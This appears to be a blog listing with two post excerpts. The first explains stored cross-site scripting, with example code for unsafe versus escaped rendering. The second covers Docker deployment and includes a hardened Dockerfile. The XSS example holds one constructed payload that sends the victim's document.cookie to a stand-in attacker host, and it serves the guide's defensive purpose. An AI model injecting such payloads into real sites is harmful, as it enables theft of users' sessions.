18Jun2015

Application Security: Cross-site scripting (XSS)

Professional web development standards are very high nowadays, and it does not matter how big your team or budget is: application security matters for a project of any size. Large software companies may even have separate departments working on nothing but security: manual code review of existing solutions, automated scanning for well-known vulnerabilities with specialised tools, unit and integration tests, research into specific cases, and adoption of modern approaches. If you are the sole developer in your startup (or even the only contributor at all), you have to spend some time playing this role yourself.

Sources of the harmful code

Cross-site scripting (XSS) is one of the most widely exploited vulnerabilities on the Web. At first sight it does not look very dangerous for application security, because there is no obvious way to harm the system or damage data on the server side. The main goal of an XSS attack is to execute attacker-controlled JavaScript in the browser of another user, with that user's session and privileges. To be executed, the code has to get into the page somehow, and there are two ways an attacker can achieve that. The first, and best known, is stored XSS: saving JavaScript as part of user-generated ("Web 2.0") content that the server stores and later renders into pages for other users.
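The stored case described above, as an added example that is not part of the original post: a small server-side rendering function for user comments, first in the form that simply concatenates the stored text into HTML, then hardened with context-aware escaping. The comment payload, the function names and the `attacker.example` host are all constructed for illustration; nothing here is taken from a real application.

```javascript
// Added example (not from the original post). Names, payload and the
// attacker host are constructed for illustration.

// Vulnerable: the stored comment is concatenated straight into the HTML
// text context, so any markup the user submitted becomes part of the page.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Escape the five characters that matter in HTML text and in double- or
// single-quoted attribute values.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every untrusted value is escaped for the context it lands in.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// HTML escaping alone does not cover every context: a user-supplied link
// target of "javascript:..." executes even when fully escaped, so URLs are
// restricted to an allow-list of schemes instead of being escaped only.
function safeHref(url) {
  try {
    // Base URL resolves relative links; the host is a placeholder (assumption).
    const u = new URL(String(url), 'https://example.invalid/');
    if (u.protocol === 'http:' || u.protocol === 'https:') {
      return escapeHtml(u.href);
    }
  } catch (e) {
    // Unparseable input falls through to the neutral value below.
  }
  return '#';
}

// Rough check used only to show the difference between the two renderers;
// a real test would load the output in a browser or an HTML parser.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed stored-XSS payload: what an attacker would submit in a
// comment form, hoping it is rendered unescaped for every later visitor.
const STORED_PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Usage: the first line ships the script to every reader, the second shows
// the same text as inert markup.
console.log(renderCommentUnsafe(STORED_PAYLOAD));
console.log(renderCommentSafe(STORED_PAYLOAD));
console.log(safeHref('javascript:alert(1)'));
```

Two points the example is meant to make: escaping has to be applied at output time, for the exact context (HTML text, attribute, URL, JavaScript string) the value ends up in, and a value that is safe in one context (the escaped `javascript:` URL) is still dangerous in another. A Content-Security-Policy header that disallows inline scripts is a useful second layer, but it does not replace output encoding.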

Read more
02Jun2015

SaaS: Docker as a container solution to reduce deployment costs

There is a lot of hype around containers as the new best technical approach to hosting, development, deployment and testing. Docker [https://www.docker.com] is the most popular container-based solution.

The problem

Nowadays software developers have a wide range of programming languages, frameworks and other tools for implementing all kinds of solutions (a static web site, a web service, an analytics database, background workers, queues, etc.). But development is only half of the story. A DevOps engineer checks the solution out of the repository to deploy it on a server, or just to test it on another machine, and "dependency hell" and other purely technical issues can turn that into a complicated quest full of traps. On top of that there are many possible target platforms (a development PC or laptop, cloud hosting, an in-house cluster, etc.), each with its own additional deployment and configuration steps. The problem is the sheer number of cases, the Cartesian product of two sets (development stacks and hosting platforms), that both the software developer and the systems administrator have to care about.

Container is a solution

The idea is not new at all. In the middle of the last century the freight industry had almost the same problem with two sets: cargo of every size and shape, and plenty of ways to transport it. The standard shipping container was introduced as a universal wrapper for any kind of goods, and the industry now operates in terms of those standard containers. Software as a Service applies the same idea. Docker lets the developer pack an application together with all its dependencies into a container and be confident it will run anywhere, while the system administrator only has to worry about configuring the container environment and can be confident it will run any application delivered as a container.
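What "packing an application with all its dependencies" looks like in practice, as an added example that is not from the original post: a Dockerfile for a hypothetical Node.js web service. The base image tag, the file names, the user name and the port are all assumptions; the two lines a security reviewer looks for first are the pinned base image and the `USER` switch, because the convenient alternatives (`FROM node:latest`, and no `USER` line at all) give you a non-reproducible build that runs the service as root inside the container.

```dockerfile
# Added example (not from the original post). Tag, paths, user and port
# are assumptions for a hypothetical Node.js service.

# Pin the base image to a specific tag (or, better, an image digest) so the
# same source always builds the same image on every platform.
FROM node:22-alpine

WORKDIR /app

# Copy the dependency manifest first: this layer is cached until
# package.json or package-lock.json changes, so rebuilds stay fast.
COPY package.json package-lock.json ./
# "npm ci" installs exactly the locked versions; dev-only packages are left out.
RUN npm ci --omit=dev

# Now the application code itself.
COPY . .

# Do not run the service as root inside the container: create an
# unprivileged user, hand it the application directory and switch to it.
RUN addgroup -S app && adduser -S -G app app && chown -R app:app /app
USER app

ENV NODE_ENV=production
# Port the hypothetical service listens on.
EXPOSE 8080

CMD ["node", "server.js"]
```

Built once with `docker build -t myservice .`, the resulting image carries the runtime, the exact dependency versions and the code, so the administrator's side of the Cartesian product collapses to "can this host run a container". A `.dockerignore` that excludes `.git`, local `node_modules` and any `.env` files keeps secrets and build noise out of the image.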

Read more